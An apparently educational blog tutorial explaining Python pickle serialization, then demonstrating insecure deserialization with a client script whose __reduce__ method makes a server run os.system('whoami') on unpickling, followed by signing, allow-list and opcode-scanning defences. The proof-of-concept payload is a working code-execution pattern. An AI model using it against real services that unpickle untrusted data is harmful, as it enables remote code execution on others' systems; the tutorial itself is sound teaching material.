Python serialization and deserialization
Before going on about what insecure deserialization is, I will explain what serialization and deserialization are.
Serialization is the process of converting an object into a stream of bytes so that it can be stored in memory, a database, or a file, or sent over a network. Here, an object means a whole data structure, such as a dictionary or a class instance with several fields, rather than a single primitive value. Serialization goes by different names in different languages: it is called serialization in Java, pickling in Python, and marshalling in some other languages (Ruby's Marshal module, for example). Deserialization is the reverse process: rebuilding the original object from the serialized bytes.
Allow me to demonstrate.
We will be using a Python library called pickle. If you have a terminal up and running, type the following command.
python3
This will open a Python 3 interactive session in the terminal. Now import the pickle library.
>>> import pickle
Next, define an object.
>>> example = {"name": "Shibin", "position": "sec engineer"}
Now that we have defined our object, we will pickle (serialize) it. The pickle library has many functions, all of which are covered in the official Python documentation for the module. Here we will use only two of them: dumps() and loads().
pickle.dumps() pickles (serializes) the data. It takes the object to be pickled as its argument and returns the result as a bytes object.
pickle.loads() unpickles (deserializes) the data. It takes a bytes object containing pickled data as its argument and returns the reconstructed object.
Let's pickle the object that we have.
>>> pickle.dumps(example)
This will pickle the data, and the output will look something like this (the exact bytes depend on the Python version and the pickle protocol in use):
b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.'
Now let's use loads():
>>> pickle.loads(b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.')
This gives us the data back:
{'name': 'Shibin', 'position': 'sec engineer'}
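The same round trip can be checked in a script instead of the interactive session. This is only a minimal sketch; the variable names blob and restored are my own and not part of the pickle API.

```python
import pickle

example = {"name": "Shibin", "position": "sec engineer"}

# dumps() returns a bytes object; its exact contents depend on the pickle protocol.
blob = pickle.dumps(example)

# loads() rebuilds an equal, but separate, object from those bytes.
restored = pickle.loads(blob)

print(type(blob).__name__)   # bytes
print(restored == example)   # True
print(restored is example)   # False
```

The last line is worth noticing: unpickling creates a new object with the same contents, it does not hand back the original one.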
Now you might be wondering how this could be dangerous enough to be listed in the OWASP Top 10 vulnerabilities. Insecure deserialization is when an app deserializes the data it receives without validating it in any way, or even checking its authenticity.
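To make "checking its authenticity" concrete, here is one possible sketch using an HMAC tag from Python's standard hmac module. The key SECRET_KEY and the helpers sign() and verify_and_load() are hypothetical names made up for this illustration, and the sketch assumes the client and server share a secret that an attacker does not know.

```python
import hashlib
import hmac
import pickle

# Assumption: a secret shared by client and server (hypothetical value).
SECRET_KEY = b"replace-with-a-real-secret"

def sign(payload: bytes) -> bytes:
    """Prefix the payload with its 32-byte HMAC-SHA256 tag."""
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload

def verify_and_load(message: bytes):
    """Unpickle only if the tag matches; otherwise refuse."""
    tag, payload = message[:32], message[32:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)

message = sign(pickle.dumps({"name": "Shibin"}))
print(verify_and_load(message))

# Changing even one byte of the payload makes verification fail.
tampered = message[:-1] + b"!"
try:
    verify_and_load(tampered)
except ValueError as err:
    print(err)
```

A valid tag only shows that the data came from someone who holds the key. It does not make the pickle itself harmless, so this complements the advice on untrusted sources rather than replacing it.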
Again, allow me to demonstrate.
Consider a (shady) Python app that has both a server side (server.py) and a client side (client.py). The client pickles some data and sends it over to the server, and the server unpickles the data and displays it.
The script for client.py is:
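import os
import pickle

def serialize_exploit():
    name = {"name": "shibin", "pos": "sec Engineer"}
    # Open demo.pickle for binary writing; the with-block closes it afterwards.
    with open("demo.pickle", "wb") as f:
        # dump() writes the pickled object into f and returns None.
        safecode = pickle.dump(name, f)
    return safecode

if __name__ == '__main__':
    safecode = serialize_exploit()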
(Hmm. Shady app indeed. Why does it import the os library!?) The script has a function serialize_exploit() which defines an object called name. A file called demo.pickle is then opened for writing in binary mode, after which dump() (not dumps()) is used to pickle the object name and write it into the file.
Run the client with python3.
python3 client.py
The pickled data is written into the file demo.pickle. Printing the file using cat will show something like this (the non-printable bytes are not displayed properly):
?}q(XnameqXshibinqXposqX sec Engineerqu.%
The script for server.py is:
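import os
import pickle

def insecure_deserialization():
    # Open demo.pickle for binary reading; the with-block closes it afterwards.
    with open("demo.pickle", "rb") as f:
        # load() reads the pickled bytes from f and rebuilds the object, with no checks at all.
        na = pickle.load(f)
    return na

if __name__ == '__main__':
    print(insecure_deserialization())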
This script has a function called insecure_deserialization() which opens the file demo.pickle for reading in binary mode. The function load() (not loads()) reads the data and unpickles it. The result is then printed.
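Since both pairs of functions have now appeared, here is a small side-by-side sketch of dumps()/loads() versus dump()/load(). It uses io.BytesIO as an in-memory stand-in for demo.pickle, which is my own substitution so that the example does not touch the disk.

```python
import io
import pickle

data = {"name": "shibin", "pos": "sec Engineer"}

# dumps()/loads() work with bytes objects held in memory.
as_bytes = pickle.dumps(data)
from_bytes = pickle.loads(as_bytes)

# dump()/load() work with any binary file-like object.
buffer = io.BytesIO()       # stand-in for open("demo.pickle", "wb")
pickle.dump(data, buffer)   # returns None; the bytes go into the buffer
buffer.seek(0)              # rewind before reading, like reopening the file
from_file = pickle.load(buffer)

print(from_bytes == data)   # True
print(from_file == data)    # True
```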
Run the server with python3.
python3 server.py
It will print the data:
{'name': 'shibin', 'pos': 'sec Engineer'}
So in short, the client pickles (serializes) some data and the server unpickles (deserializes) it without validating what it received.
Now begins the interesting part.
Let us focus on client.py. Since there is no validation whatsoever, the client can pickle anything it likes and the server will unpickle it. So let's modify the script client.py as shown below:
import os
import pickle

class ImVulnerable():
    def __reduce__(self):
        # On unpickling, pickle will call os.system('whoami').
        return (os.system, ('whoami',))

def serialize_exploit():
    name = {"name": "shibin", "pos": "sec Engineer"}
    f = open("demo.pickle", "wb")
    safecode = pickle.dump(ImVulnerable(), f)
    return safecode

if __name__ == '__main__':
    safecode = serialize_exploit()
The changes are the new ImVulnerable class and the object passed to dump(). We define a class ImVulnerable, and inside it is a method __reduce__() which returns a callable (os.system, from Python's os library) together with its arguments (the shell command whoami). pickle records this pair and calls os.system('whoami') when the data is unpickled. An instance of this class is then passed as an argument to dump() which, as you are familiar with by now, pickles it and writes it into the file demo.pickle. The content of the file demo.pickle is now:
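To see what __reduce__() does without running any shell command, here is a harmless sketch of the same mechanism. The class name Harmless is made up for this illustration, and the built-in sorted() stands in for os.system.

```python
import pickle

class Harmless:
    # __reduce__ returns (callable, args). On unpickling, pickle calls
    # sorted([3, 1, 2]) and uses the return value as the "object".
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(Harmless())
result = pickle.loads(blob)

print(result)                        # [1, 2, 3]
print(isinstance(result, Harmless))  # False
```

What comes out of loads() is whatever the callable returned, not a Harmless instance. Swap sorted for os.system and the list for a command string, and unpickling runs that command.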
?cossystemqXwhoamiq?qRq.%
Note that we have not edited the file server.py so far. Now when I run the server file, it reads demo.pickle and unpickles the data. Instead of rebuilding a dictionary to print, unpickling calls os.system('whoami'): the shell command whoami is executed by the server script, and what gets printed is the name of the user running the server (followed by the return value of os.system, normally 0)!
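If you want to look inside a pickle without executing it, the standard pickletools module can walk its opcodes. The sketch below is only a rough heuristic: the helper suspicious_opcodes() and the SUSPICIOUS set are my own, the class CallsSorted is a harmless stand-in for a malicious payload, and a clean result is not proof that a pickle is safe.

```python
import pickle
import pickletools

# Opcodes that import names or call callables during unpickling.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def suspicious_opcodes(blob: bytes) -> set:
    """Return the suspicious opcode names found in blob, without unpickling it."""
    return {op.name for op, arg, pos in pickletools.genops(blob)} & SUSPICIOUS

class CallsSorted:
    # Harmless stand-in: unpickling would call sorted([3, 1, 2]).
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

plain = pickle.dumps({"name": "shibin", "pos": "sec Engineer"})
crafted = pickle.dumps(CallsSorted())

print(suspicious_opcodes(plain))    # set()
print(suspicious_opcodes(crafted))  # includes 'REDUCE'
```

A plain dictionary of strings needs no imports or calls, so nothing is flagged. The crafted pickle has to name a callable and invoke it, and that shows up in the opcode stream.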
If this were really a server and a client talking over a network, that would be REMOTE CODE EXECUTION, JUST LIKE THAT!
How to prevent this:
- DO NOT accept serialized data from untrusted sources.
- Run deserialization code with limited access permissions.
- Validate user input. Cyber Security 101: never trust user input!
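If pickle has to stay, one way to apply the "validate" advice is to restrict what the unpickler is allowed to import, by overriding Unpickler.find_class(). The sketch below follows the pattern described in the pickle documentation. The allow-list SAFE_BUILTINS and the helper restricted_loads() are illustrative choices of mine, not a complete defence.

```python
import builtins
import io
import os
import pickle

# Assumption: the app only ever needs these builtins; everything else is refused.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks to import a global (class or function).
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(blob: bytes):
    """Like pickle.loads(), but refuses any global not on the allow-list."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()

class ImVulnerable:
    def __reduce__(self):
        return (os.system, ("whoami",))

# Plain data still round-trips.
print(restricted_loads(pickle.dumps({"name": "shibin", "pos": "sec Engineer"})))

# The exploit payload is rejected before os.system is ever looked up.
try:
    restricted_loads(pickle.dumps(ImVulnerable()))
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

For data as simple as the dictionary in this article, a data-only format such as JSON avoids the problem altogether, since parsing it does not call arbitrary functions.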
Hope this article was straightforward. :)